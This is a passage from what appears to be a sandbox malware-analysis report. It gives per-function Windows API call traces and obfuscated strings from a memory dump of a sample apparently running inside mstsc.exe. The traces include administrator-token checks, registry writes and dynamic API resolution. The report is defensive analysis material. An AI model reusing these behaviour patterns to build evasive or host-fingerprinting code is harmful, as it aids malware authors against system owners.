HeapFree.KERNEL32(00000000,?,00000000), ref: 0006EC66

Strings

[##', xrefs: 0006EB57
5WGK5, xrefs: 0006EBAA
dD6q5S, xrefs: 0006EB41
60Z5, xrefs: 0006EADA

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006E6ED, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 138

APIs

GetModuleHandleW.KERNEL32(00000000,7142434B,00106D80,?,?,?,?,?,?,?,?,00061A31), ref: 0006E6FD
GetVersion.KERNEL32(?,?,?,?,?,?,?,?,00061A31,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006E703
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00061A31,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006E70E

Part of subcall function 000673B6: GetProcessHeap.KERNEL32(00000008,0000000E,?,7142434B,00106D80), ref: 000673EF
Part of subcall function 000673B6: HeapAlloc.KERNEL32(00000000), ref: 000673F2
Part of subcall function 000673B6: GetLogicalDrives.KERNEL32 ref: 00067406
Part of subcall function 000673B6: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 00067460
Part of subcall function 000673B6: HeapAlloc.KERNEL32(00000000), ref: 00067463
Part of subcall function 000673B6: IsSystemResumeAutomatic.KERNEL32 ref: 00067477
Part of subcall function 000673B6: GetModuleHandleA.KERNEL32(00000000,?), ref: 000674A8
Part of subcall function 000673B6: GetProcAddress.KERNEL32(00000000), ref: 000674AF
Part of subcall function 000673B6: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000674BE
Part of subcall function 000673B6: HeapFree.KERNEL32(00000000), ref: 000674C7
Part of subcall function 000673B6: GetProcessHeap.KERNEL32(00000000,?), ref: 000674CC
Part of subcall function 000673B6: HeapFree.KERNEL32(00000000), ref: 000674CF

Part of subcall function 0006E684: GetModuleHandleA.KERNEL32(?,?), ref: 0006E6BD
Part of subcall function 0006E684: GetProcAddress.KERNEL32(00000000), ref: 0006E6C4

GetProcessHeap.KERNEL32(00000008,00000020,?,?,?,?,?,?,?,?,00061A31), ref: 0006E72D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00061A31,?,?,?,?,?,KCBqiNhR7x), ref: 0006E736
GetComputerNameW.KERNEL32(00000000,?), ref: 0006E751
GetProcessHeap.KERNEL32(00000008,0000001D,?), ref: 0006E78C
HeapAlloc.KERNEL32(00000000), ref: 0006E78F
GetClipboardOwner.USER32 ref: 0006E79C
lstrcpyW.KERNEL32(00000000), ref: 0006E7CF
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006E7DE
HeapFree.KERNEL32(00000000), ref: 0006E7E1

Part of subcall function 0006E310: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,0006E7ED,?), ref: 0006E39F
Part of subcall function 0006E310: GetProcessHeap.KERNEL32(00000008,000000C8,774229EE,76E6FE8D), ref: 0006E3B7
Part of subcall function 0006E310: HeapAlloc.KERNEL32(00000000), ref: 0006E3BE
Part of subcall function 0006E310: RegQueryValueExA.ADVAPI32(0006E7ED,?,00000000,00000000,00000000,?), ref: 0006E3EB
Part of subcall function 0006E310: RegQueryValueExA.ADVAPI32(0006E7ED,74736E49,00000000,00000000,?,00000004), ref: 0006E411
Part of subcall function 0006E310: RegQueryValueExA.ADVAPI32(0006E7ED,49676552,00000000,00000000,?,00000004), ref: 0006E43F
Part of subcall function 0006E310: GetTickCount.KERNEL32 ref: 0006E445
Part of subcall function 0006E310: RegCloseKey.ADVAPI32(0006E7ED), ref: 0006E451
Part of subcall function 0006E310: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,0004001F,0006E7ED), ref: 0006E467
Part of subcall function 0006E310: RegSetValueExA.ADVAPI32(0006E7ED,49676552,00000000,00000004,?,00000004), ref: 0006E482
Part of subcall function 0006E310: RegCloseKey.ADVAPI32(0006E7ED), ref: 0006E499
Part of subcall function 0006E310: lstrlenA.KERNEL32(00000008), ref: 0006E4A5
Part of subcall function 0006E310: GetProcessHeap.KERNEL32(00000008,00000010), ref: 0006E4CB
Part of subcall function 0006E310: HeapAlloc.KERNEL32(00000000), ref: 0006E4D2
Part of subcall function 0006E310: GetComputerNameA.KERNEL32(00000000,00000004), ref: 0006E4DF
Part of subcall function 0006E310: lstrlenA.KERNEL32(00000000), ref: 0006E4E6
Part of subcall function 0006E310: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006E503
Part of subcall function 0006E310: HeapFree.KERNEL32(00000000), ref: 0006E510
Part of subcall function 0006E310: GetProcessHeap.KERNEL32(00000000,?), ref: 0006E517
Part of subcall function 0006E310: HeapFree.KERNEL32(00000000), ref: 0006E51E

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0006E80F
CheckTokenMembership.ADVAPI32(00000000,?,00061A31), ref: 0006E82A
FreeSid.ADVAPI32(?), ref: 0006E836

Part of subcall function 0006E967: GetCurrentProcess.KERNEL32(00020008,0006E84F), ref: 0006E984
Part of subcall function 0006E967: OpenProcessToken.ADVAPI32(00000000), ref: 0006E98B
Part of subcall function 0006E967: GetTokenInformation.ADVAPI32(0006E84F,00000014,00000000,00000004,?), ref: 0006E9A4
Part of subcall function 0006E967: CloseHandle.KERNEL32(0006E84F), ref: 0006E9AD

CreateWellKnownSid.ADVAPI32(00000027,00000000,?,00061A31), ref: 0006E866
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0006E87C

Part of subcall function 0006E897: OpenProcessToken.ADVAPI32(00000000,00000008,?,00000000,00000000,00000000,?,0006F1FF), ref: 0006E8A6
Part of subcall function 0006E897: GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,?,?,?,0006F1FF), ref: 0006E8C2
Part of subcall function 0006E897: GetLastError.KERNEL32(?,0006F1FF), ref: 0006E8D0
Part of subcall function 0006E897: GetProcessHeap.KERNEL32(00000008,?,76E6FE8D,?,0006F1FF), ref: 0006E8E1
Part of subcall function 0006E897: HeapAlloc.KERNEL32(00000000,?,0006F1FF), ref: 0006E8E8
Part of subcall function 0006E897: GetTokenInformation.KERNELBASE(?,00000019,00000000,?,?,?,0006F1FF), ref: 0006E901
Part of subcall function 0006E897: GetSidSubAuthorityCount.ADVAPI32(00000000,?,0006F1FF), ref: 0006E90D
Part of subcall function 0006E897: GetSidSubAuthority.ADVAPI32(00000000,?,?,0006F1FF), ref: 0006E924
Part of subcall function 0006E897: GetProcessHeap.KERNEL32(00000000,00000000,?,0006F1FF), ref: 0006E946
Part of subcall function 0006E897: HeapFree.KERNEL32(00000000,?,0006F1FF), ref: 0006E94D
Part of subcall function 0006E897: CloseHandle.KERNEL32(?), ref: 0006E957

Strings

f6yD, xrefs: 0006E77F
367D, xrefs: 0006E764

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006F6F4, Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 120

APIs

GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,00000000), ref: 0006F74E
HeapAlloc.KERNEL32(00000000), ref: 0006F751
GetClipboardSequenceNumber.USER32 ref: 0006F766
GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0006F7B8
HeapAlloc.KERNEL32(00000000), ref: 0006F7BB
GetShellWindow.USER32 ref: 0006F7CF
GetModuleHandleA.KERNEL32(00000000,?), ref: 0006F800
GetProcAddress.KERNEL32(00000000), ref: 0006F807

Part of subcall function 0006F4A9: GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000,00000000), ref: 0006F4DE
Part of subcall function 0006F4A9: HeapAlloc.KERNEL32(00000000), ref: 0006F4E1
Part of subcall function 0006F4A9: GetShellWindow.USER32 ref: 0006F4FD
Part of subcall function 0006F4A9: GetProcessHeap.KERNEL32(00000008,00000017), ref: 0006F55D
Part of subcall function 0006F4A9: HeapAlloc.KERNEL32(00000000), ref: 0006F560
Part of subcall function 0006F4A9: GetInputState.USER32 ref: 0006F574
Part of subcall function 0006F4A9: GetModuleHandleA.KERNEL32(?,00000000), ref: 0006F59E
Part of subcall function 0006F4A9: GetProcAddress.KERNEL32(00000000), ref: 0006F5A5
Part of subcall function 0006F4A9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006F5B5
Part of subcall function 0006F4A9: HeapFree.KERNEL32(00000000), ref: 0006F5C2
Part of subcall function 0006F4A9: GetProcessHeap.KERNEL32(00000000,?), ref: 0006F5C7
Part of subcall function 0006F4A9: HeapFree.KERNEL32(00000000), ref: 0006F5CE

GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006F835
HeapFree.KERNEL32(00000000), ref: 0006F842
GetProcessHeap.KERNEL32(00000000,?), ref: 0006F847
HeapFree.KERNEL32(00000000), ref: 0006F84E

Strings

[##', xrefs: 0006F799
5WGK, xrefs: 0006F7AD
?$, xrefs: 0006F737
m, xrefs: 0006F76C
D, xrefs: 0006F73D
5, xrefs: 0006F7B4
DvIhPJ, xrefs: 0006F783

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 00063950, Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 116

APIs

GetVersion.KERNEL32(76E6FE8D,00000000,?), ref: 00063971
GetProcessHeap.KERNEL32(00000008,00000025), ref: 000639B0
HeapAlloc.KERNEL32(00000000), ref: 000639B7
GetCurrentProcessId.KERNEL32 ref: 000639C8
GetProcessHeap.KERNEL32(00000008,00000051), ref: 00063A72
HeapAlloc.KERNEL32(00000000), ref: 00063A79
GetForegroundWindow.USER32 ref: 00063A8A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00063AC8
HeapFree.KERNEL32(00000000), ref: 00063ACF

Strings

gW, xrefs: 0006399F
6X2g, xrefs: 00063991
!c5Y, xrefs: 00063A2B
X, xrefs: 000639AC
SgWA, xrefs: 000639A5
Y, xrefs: 00063A61
ScPYiF, xrefs: 00063AA0
F$cP, xrefs: 00063A5A
%A=S, xrefs: 00063998
hj, xrefs: 00063A90

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006F995, Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 170

APIs

GetProcessHeap.KERNEL32(00000008,0000000B,76E2204D,00000000,?), ref: 0006F9F1
HeapAlloc.KERNEL32(00000000), ref: 0006F9F4
GetShellWindow.USER32 ref: 0006FA08
GetProcessHeap.KERNEL32(00000008,00000011), ref: 0006FA67
HeapAlloc.KERNEL32(00000000), ref: 0006FA6A
GetCapture.USER32 ref: 0006FA7E
GetModuleHandleA.KERNEL32(?,00000000), ref: 0006FAAF
GetProcAddress.KERNEL32(00000000), ref: 0006FAB6
HeapFree.KERNEL32(00000000), ref: 0006FB6C

Part of subcall function 0006F6F4: GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,00000000), ref: 0006F74E
Part of subcall function 0006F6F4: HeapAlloc.KERNEL32(00000000), ref: 0006F751
Part of subcall function 0006F6F4: GetClipboardSequenceNumber.USER32 ref: 0006F766
Part of subcall function 0006F6F4: GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0006F7B8
Part of subcall function 0006F6F4: HeapAlloc.KERNEL32(00000000), ref: 0006F7BB
Part of subcall function 0006F6F4: GetShellWindow.USER32 ref: 0006F7CF
Part of subcall function 0006F6F4: GetModuleHandleA.KERNEL32(00000000,?), ref: 0006F800
Part of subcall function 0006F6F4: GetProcAddress.KERNEL32(00000000), ref: 0006F807
Part of subcall function 0006F6F4: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006F835
Part of subcall function 0006F6F4: HeapFree.KERNEL32(00000000), ref: 0006F842
Part of subcall function 0006F6F4: GetProcessHeap.KERNEL32(00000000,?), ref: 0006F847
Part of subcall function 0006F6F4: HeapFree.KERNEL32(00000000), ref: 0006F84E

Part of subcall function 0006F4A9: GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000,00000000), ref: 0006F4DE
Part of subcall function 0006F4A9: HeapAlloc.KERNEL32(00000000), ref: 0006F4E1
Part of subcall function 0006F4A9: GetShellWindow.USER32 ref: 0006F4FD
Part of subcall function 0006F4A9: GetProcessHeap.KERNEL32(00000008,00000017), ref: 0006F55D
Part of subcall function 0006F4A9: HeapAlloc.KERNEL32(00000000), ref: 0006F560
Part of subcall function 0006F4A9: GetInputState.USER32 ref: 0006F574
Part of subcall function 0006F4A9: GetModuleHandleA.KERNEL32(?,00000000), ref: 0006F59E
Part of subcall function 0006F4A9: GetProcAddress.KERNEL32(00000000), ref: 0006F5A5
Part of subcall function 0006F4A9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006F5B5
Part of subcall function 0006F4A9: HeapFree.KERNEL32(00000000), ref: 0006F5C2
Part of subcall function 0006F4A9: GetProcessHeap.KERNEL32(00000000,?), ref: 0006F5C7
Part of subcall function 0006F4A9: HeapFree.KERNEL32(00000000), ref: 0006F5CE

CloseHandle.KERNEL32(00000000), ref: 0006FB4A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006FB59
HeapFree.KERNEL32(00000000), ref: 0006FB62
GetProcessHeap.KERNEL32(00000000,?), ref: 0006FB69

Strings

[##', xrefs: 0006F9BB
'@, xrefs: 0006FA3E
'5, xrefs: 0006F9E0
5WGK5, xrefs: 0006FA25

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 00064AB4, Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 119

APIs

OpenProcess.KERNEL32(00000400,00000000), ref: 00064AFF
GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 00064B21
GetProcessHeap.KERNEL32(00000008,0000000E), ref: 00064B58
HeapAlloc.KERNEL32(00000000), ref: 00064B5F
GetForegroundWindow.USER32 ref: 00064B70
wsprintfA.USER32 ref: 00064BAD
FindAtomA.KERNEL32(?), ref: 00064BBD
GlobalFindAtomA.KERNEL32(?), ref: 00064BD2
GlobalAddAtomA.KERNEL32(?), ref: 00064BE4
AddAtomA.KERNEL32(?), ref: 00064BF1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064BFD
HeapFree.KERNEL32(00000000), ref: 00064C04
CloseHandle.KERNEL32(?), ref: 00064C0D

Strings

cQtK, xrefs: 00064B40
liFaL3, xrefs: 00064B8D
l, xrefs: 00064B47
IkD, xrefs: 00064B32

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006B9E6, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 114

APIs

GetProcessHeap.KERNEL32(00000008,0000000B,00000000), ref: 0006BA29
HeapAlloc.KERNEL32(00000000), ref: 0006BA2C
GetShellWindow.USER32 ref: 0006BA40
GetProcessHeap.KERNEL32(00000008,00000011), ref: 0006BA9F
HeapAlloc.KERNEL32(00000000), ref: 0006BAA2
GetMessageTime.USER32 ref: 0006BAB6
GetModuleHandleA.KERNEL32(?,00000000), ref: 0006BAE7
GetProcAddress.KERNEL32(00000000), ref: 0006BAEE

Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000008,00000208,0007CAA8), ref: 00063E3F
Part of subcall function 00063E17: HeapAlloc.KERNEL32(00000000), ref: 00063E42
Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000008,00000039,00020019), ref: 00063ED2
Part of subcall function 00063E17: HeapAlloc.KERNEL32(00000000), ref: 00063ED9
Part of subcall function 00063E17: GetTickCount.KERNEL32 ref: 00063EED
Part of subcall function 00063E17: wsprintfW.USER32 ref: 00063F24
Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00063F6E
Part of subcall function 00063E17: HeapAlloc.KERNEL32(00000000), ref: 00063F71
Part of subcall function 00063E17: GetCaretBlinkTime.USER32 ref: 00063F86
Part of subcall function 00063E17: wsprintfW.USER32 ref: 00063FC8
Part of subcall function 00063E17: RegQueryValueExW.ADVAPI32(00000000,?,00000000,00000003,00000000,?,00020019), ref: 0006401D
Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000008,?), ref: 0006402C
Part of subcall function 00063E17: HeapAlloc.KERNEL32(00000000), ref: 0006402F
Part of subcall function 00063E17: RegQueryValueExW.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 00064051
Part of subcall function 00063E17: RegCloseKey.ADVAPI32(?), ref: 00064077
Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000008,?), ref: 00064099
Part of subcall function 00063E17: HeapAlloc.KERNEL32(00000000), ref: 0006409C
Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 000640AE
Part of subcall function 00063E17: HeapReAlloc.KERNEL32(00000000), ref: 000640B1
Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000640D5
Part of subcall function 00063E17: HeapFree.KERNEL32(00000000), ref: 000640D8
Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000000,00000000,00020019), ref: 000640E4
Part of subcall function 00063E17: HeapFree.KERNEL32(00000000), ref: 000640ED
Part of subcall function 00063E17: RegCloseKey.ADVAPI32(?), ref: 000640FC
Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000000,?), ref: 00064107
Part of subcall function 00063E17: HeapFree.KERNEL32(00000000), ref: 0006410A
Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000000,00000000,00020019), ref: 00064112
Part of subcall function 00063E17: HeapFree.KERNEL32(00000000), ref: 00064115

Part of subcall function 0006482B: GetProcessHeap.KERNEL32(00000000,?,?,00000000,0006318E,?,?,?,?,?,?,?,?,?,?,00062973), ref: 00064845
Part of subcall function 0006482B: HeapFree.KERNEL32(00000000,?,?), ref: 0006484C

GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006BB23
HeapFree.KERNEL32(00000000), ref: 0006BB2C
GetProcessHeap.KERNEL32(00000000,?), ref: 0006BB31
HeapFree.KERNEL32(00000000), ref: 0006BB34

Strings

bKTU, xrefs: 0006BA92
'5, xrefs: 0006BA18
[##', xrefs: 0006BA0A
JJ, xrefs: 0006BA99
08, xrefs: 0006BA84

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 00064C1F, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 111

APIs

GetProcessHeap.KERNEL32(00000008,00000010), ref: 00064C65
HeapAlloc.KERNEL32(00000000), ref: 00064C68
GetMessageTime.USER32 ref: 00064C7D
GetProcessHeap.KERNEL32(00000008,0000000E), ref: 00064CD4
HeapAlloc.KERNEL32(00000000), ref: 00064CD7
IsSystemResumeAutomatic.KERNEL32 ref: 00064CEB
GetModuleHandleA.KERNEL32(00000000,?), ref: 00064D1C
GetProcAddress.KERNEL32(00000000), ref: 00064D23
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064D4F
HeapFree.KERNEL32(00000000), ref: 00064D5C
GetProcessHeap.KERNEL32(00000000,?), ref: 00064D61
HeapFree.KERNEL32(00000000), ref: 00064D68

Strings

3!'Q, xrefs: 00064C47
daAND4, xrefs: 00064C9A
c, xrefs: 00064CC5
qBc2R, xrefs: 00064D08
A, xrefs: 00064C54

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006D768, Relevance: 29.8, APIs: 11, Strings: 6, Instructions: 100

APIs

GetProcessHeap.KERNEL32(00000008,00000061,?,00000000,00000000), ref: 0006D7EF
HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 0006D7F2
GetShellWindow.USER32 ref: 0006D803
CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000208,00000000,?,00000000,00000000), ref: 0006D83D
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000208,?,00000000,00000000), ref: 0006D86B
CloseHandle.KERNEL32 ref: 0006D880
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0006D88E
HeapFree.KERNEL32(00000000,?,00000000), ref: 0006D891
StrCpyW.SHLWAPI(00000000,?,?,00000000,00000000), ref: 0006D89F
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0006D8A7
HeapFree.KERNEL32(00000000,?,00000000), ref: 0006D8AA

Strings

`j y, xrefs: 0006D7C8
ye3jE, xrefs: 0006D820
*e[j, xrefs: 0006D7B3
+ye3, xrefs: 0006D7DD
?y!3, xrefs: 0006D797
}j$y, xrefs: 0006D7A5

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006F859, Relevance: 29.8, APIs: 12, Strings: 5, Instructions: 99

APIs

GetProcessHeap.KERNEL32(00000008,0000000B,76E2204D,00000000,?), ref: 0006F888
HeapAlloc.KERNEL32(00000000), ref: 0006F88F
GetShellWindow.USER32 ref: 0006F8A1
GetProcessHeap.KERNEL32(00000008,00000016), ref: 0006F905
HeapAlloc.KERNEL32(00000000), ref: 0006F90C
CloseClipboard.USER32 ref: 0006F920
LoadLibraryA.KERNEL32(?), ref: 0006F951
GetProcAddress.KERNEL32(00000000), ref: 0006F958

Part of subcall function 0006F4A9: GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000,00000000), ref: 0006F4DE
Part of subcall function 0006F4A9: HeapAlloc.KERNEL32(00000000), ref: 0006F4E1
Part of subcall function 0006F4A9: GetShellWindow.USER32 ref: 0006F4FD
Part of subcall function 0006F4A9: GetProcessHeap.KERNEL32(00000008,00000017), ref: 0006F55D
Part of subcall function 0006F4A9: HeapAlloc.KERNEL32(00000000), ref: 0006F560
Part of subcall function 0006F4A9: GetInputState.USER32 ref: 0006F574
Part of subcall function 0006F4A9: GetModuleHandleA.KERNEL32(?,00000000), ref: 0006F59E
Part of subcall function 0006F4A9: GetProcAddress.KERNEL32(00000000), ref: 0006F5A5
Part of subcall function 0006F4A9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006F5B5
Part of subcall function 0006F4A9: HeapFree.KERNEL32(00000000), ref: 0006F5C2
Part of subcall function 0006F4A9: GetProcessHeap.KERNEL32(00000000,?), ref: 0006F5C7
Part of subcall function 0006F4A9: HeapFree.KERNEL32(00000000), ref: 0006F5CE

GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006F971
HeapFree.KERNEL32(00000000), ref: 0006F97E
GetProcessHeap.KERNEL32(00000000,?), ref: 0006F983
HeapFree.KERNEL32(00000000), ref: 0006F98A

Strings

[##', xrefs: 0006F869
5WGK5, xrefs: 0006F8BE
'5, xrefs: 0006F877
Q, xrefs: 0006F8F4
>41, xrefs: 0006F8E6

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006F4A9, Relevance: 29.8, APIs: 12, Strings: 5, Instructions: 98

APIs

GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000,00000000), ref: 0006F4DE
HeapAlloc.KERNEL32(00000000), ref: 0006F4E1
GetShellWindow.USER32 ref: 0006F4FD
GetProcessHeap.KERNEL32(00000008,00000017), ref: 0006F55D
HeapAlloc.KERNEL32(00000000), ref: 0006F560
GetInputState.USER32 ref: 0006F574
GetModuleHandleA.KERNEL32(?,00000000), ref: 0006F59E
GetProcAddress.KERNEL32(00000000), ref: 0006F5A5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006F5B5
HeapFree.KERNEL32(00000000), ref: 0006F5C2
GetProcessHeap.KERNEL32(00000000,?), ref: 0006F5C7
HeapFree.KERNEL32(00000000), ref: 0006F5CE

Strings

;?B,, xrefs: 0006F530
[##', xrefs: 0006F4BF
'5, xrefs: 0006F4CD
s? , xrefs: 0006F545
5WGK5, xrefs: 0006F513

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006765B, Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 121

APIs

GetProcessHeap.KERNEL32(00000008,0000001F,00000000,?,00000000), ref: 000676D7
HeapAlloc.KERNEL32(00000000), ref: 000676DA
GetProcessHeap.KERNEL32 ref: 000676EF
GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0006773B
HeapAlloc.KERNEL32(00000000), ref: 0006773E
IsSystemResumeAutomatic.KERNEL32 ref: 00067752
GetModuleHandleA.KERNEL32(00000000,?), ref: 00067783
GetProcAddress.KERNEL32(00000000), ref: 0006778A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006779E
HeapFree.KERNEL32(00000000), ref: 000677A7
GetProcessHeap.KERNEL32(00000000,?), ref: 000677AC
HeapFree.KERNEL32(00000000), ref: 000677AF

Strings

qxqoVh, xrefs: 00067701
c, xrefs: 0006772C
qBc2, xrefs: 00067730
R, xrefs: 00067737

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 000670D8, Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 119

APIs

GetProcessHeap.KERNEL32(00000008,00000047), ref: 00067185
HeapAlloc.KERNEL32(00000000), ref: 0006718C
RevertToSelf.ADVAPI32 ref: 000671A5
GetProcessHeap.KERNEL32(00000008,00000006), ref: 000671E8
HeapAlloc.KERNEL32(00000000), ref: 000671EF
GetCurrentProcessId.KERNEL32 ref: 00067203
wsprintfA.USER32 ref: 0006723A
RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 00067253
RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000004,00000000,00000004), ref: 00067272
RegCloseKey.ADVAPI32(00000000), ref: 0006727B
Sleep.KERNEL32(000003E8), ref: 0006728C

Strings

FzpDO5, xrefs: 000671BB
zoQz, xrefs: 000671DB
uR, xrefs: 000671E2
,D, xrefs: 00067172
,&V, xrefs: 00067109

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 000678D6, Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 100

APIs

GetProcessHeap.KERNEL32(00000008,0000000B,00000000,?,00000000), ref: 0006790B
HeapAlloc.KERNEL32(00000000), ref: 0006790E
GetShellWindow.USER32 ref: 00067923
GetProcessHeap.KERNEL32(00000008,0000000F), ref: 0006797E
HeapAlloc.KERNEL32(00000000), ref: 00067981
GetDoubleClickTime.USER32 ref: 00067995
GetModuleHandleA.KERNEL32(00067A46), ref: 000679C5
GetProcAddress.KERNEL32(00000000,00000000), ref: 000679CD
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000679E8
HeapFree.KERNEL32(00000000), ref: 000679F5
GetProcessHeap.KERNEL32(00000000,00067A46), ref: 000679FA
HeapFree.KERNEL32(00000000), ref: 00067A01

Strings

[##', xrefs: 000678EC
4g, xrefs: 0006796B
5WGK5, xrefs: 00067940
+, xrefs: 00067964

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006A7D8, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 127

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,7142434B,00106D80), ref: 0006A845
HeapAlloc.KERNEL32(00000000), ref: 0006A84C
GetMessageExtraInfo.USER32 ref: 0006A868
GetProcessHeap.KERNEL32(00000008,00000016), ref: 0006A8CF
HeapAlloc.KERNEL32(00000000), ref: 0006A8D6
GetDoubleClickTime.USER32 ref: 0006A8EA
LoadLibraryA.KERNEL32(?), ref: 0006A914
GetProcAddress.KERNEL32(00000000), ref: 0006A91B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006A94F
HeapFree.KERNEL32(00000000), ref: 0006A95C
GetProcessHeap.KERNEL32(00000000,?), ref: 0006A961
HeapFree.KERNEL32(00000000), ref: 0006A968

Strings

)Z1:, xrefs: 0006A8B3
4ESt, xrefs: 0006A8C4

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006A4DC, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 107

APIs

GetProcessHeap.KERNEL32(00000008,0000000A,00000001,00000000,76E6FE8D), ref: 0006A50C
HeapAlloc.KERNEL32(00000000), ref: 0006A50F
GetMessagePos.USER32 ref: 0006A52A
